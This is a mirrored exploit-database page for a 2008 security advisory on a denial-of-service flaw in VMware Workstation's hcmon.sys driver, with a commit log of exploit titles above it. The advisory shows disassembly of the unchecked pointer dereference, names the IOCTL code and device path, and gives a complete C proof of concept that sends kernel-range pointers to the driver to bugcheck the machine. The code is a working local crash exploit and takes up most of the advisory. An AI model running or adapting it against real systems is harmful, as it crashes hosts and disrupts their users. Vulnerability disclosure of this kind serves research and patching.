bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/6262.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

160 lines
4.7 KiB
Text
Executable file
Raw Blame History

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- - Orange Bat advisory -
Name : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class : DoS
Published : 2008-08-17
Credit : g_ (g_ # orange-bat # com)
- - Details -
Fails to sanitize pointers sent from usermode with METHOD_NEITHER.
hcmon.sys:
.text:00011606 loc_11606: .text:00011606 mov eax, [ebp+SystemBuffer]
.text:00011609 mov [ebp+SystemBuffer2], eax
.text:0001160C mov ecx, [ebp+SystemBuffer2]
.text:0001160F mov edx, [ecx+0Ch] <---- BUGCHECK
.text:00011612 cmp edx, [ebp+var_20]
.text:00011615 jnz short loc_11629
.text:00011617 cmp [ebp+NumberOfBytes], 70h
.text:0001161B jb short loc_11629
.text:0001161D mov eax, [ebp+SystemBuffer2]
.text:00011620 cmp dword ptr [eax+8], 7FFBh
.text:00011627 jbe short loc_11638
This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon
device.
- - Proof of concept -
#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>
void TextError(LPTSTR lpszFunction)
{
// Retrieve the system error message for the last-error code
LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError();
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL );
// Display the error message and exit the process
lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
(lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40) \
*sizeof(TCHAR));
sprintf((LPTSTR)lpDisplayBuf,
TEXT("%s failed with error %d: %s"),
lpszFunction, dw, lpMsgBuf);
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);
printf(lpDisplayBuf);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
}
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, \
DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
HANDLE hDevice; // handle to the drive to be examined
BOOL bResult; // results flag
DWORD junk; // discard results
IO_STATUS_BLOCK IoStatusBlock;
hDevice = CreateFile(DeviceName,
0, // no access to the drive
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
OPEN_EXISTING, // disposition
0, // file attributes
NULL); // do not copy file attributes
if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive
{
TextError("CreateFile");
return (FALSE);
}
bResult = DeviceIoControl(hDevice, // device to be queried
Ioctl,
(PVOID)InputBuffer,
InputLen,
(PVOID)OutputBuffer,
OutputLen, // output buffer
&junk, // # bytes returned
(LPOVERLAPPED)NULL); // synchronous I/O
if(!bResult){
TextError("DeviceIoControl");
}
CloseHandle(hDevice);
return TRUE;
}
int main(int argc, char *argv[])
{
DWORD Ioctl, Input, ILen, Output, OLen;
DWORD SSDT;
char *ptr;
if(TestIOCTL("\\\\.\\hcmon", 0x8101232B, 0x80000001, 0, 0x80000002, 0)){
printf("You should not see this");
}
else{
printf("Failed to open device");
}
return 0;
}
- - PGP -
All advisories from Orange Bat are signed. You can find our public
key here: http://www.orange-bat.com/g_.asc
- - Disclaimer -
This document and all the information it contains is provided "as is",
without any warranty. Orange Bat is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.
Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.
(c) 2008 www.orange-bat.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70
iEYEARECAAYFAkioiW4ACgkQIUHRVUfOLgUQEQCdE1YYpJAUypShf5oStwMfbRRC
BPMAniLYABIgCgxkZVSQAQawV060P4M8
=cp6A
-----END PGP SIGNATURE-----
# milw0rm.com [2008-08-18]
Reference in a new issue View git blame Copy permalink